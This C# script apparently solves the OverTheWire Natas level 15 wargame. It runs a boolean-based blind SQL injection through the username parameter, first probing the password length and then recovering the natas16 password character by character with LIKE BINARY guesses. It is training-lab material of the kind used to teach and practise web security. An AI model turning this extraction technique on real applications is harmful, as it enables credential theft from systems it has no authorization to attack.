otw_natas15.cs

var client = new HttpClient();
var confirmationString = "This user exists";
var baseUrl = "http://natas15.natas.labs.overthewire.org";

var userPass = "natas15:<-- natas15 password -->";

var token = Convert.ToBase64String(Encoding.UTF8.GetBytes(userPass));

client.DefaultRequestHeaders.Authorization = new AuthenticationHeaderValue("Basic", token);
var passwordLength = 0;

for (int i = 1; i <= 64; i++)
{
	var response = await client.GetStringAsync($"{baseUrl}?username=natas16%22+AND+LENGTH(password)+%3D+{i}+%23&debug=true");

	if (response.Contains(confirmationString))
	{
		passwordLength = i;
		break;
	}
}

var characterSet = Enumerable.Range('0', '9' - '0' + 1)
	.Union(Enumerable.Range('A', 'Z' - 'A' + 1))
	.Union(Enumerable.Range('a', 'z' - 'a' + 1))
	.Select(Convert.ToChar).ToList();

var password = new StringBuilder();

for (int i = 0; i < passwordLength; i++)
{
	var found = false;
	var gi = 0;
	while (!found)
	{
		var guess = characterSet[gi++];
		var response = await client.GetStringAsync($"{baseUrl}?username=natas16%22+AND+password+LIKE+BINARY+%22{password}{guess}%25%22+%23&debug=true");

		if (response.Contains(confirmationString))
		{
			password.Append(guess);
			found = true;
		}
	}
}

Console.WriteLine(password);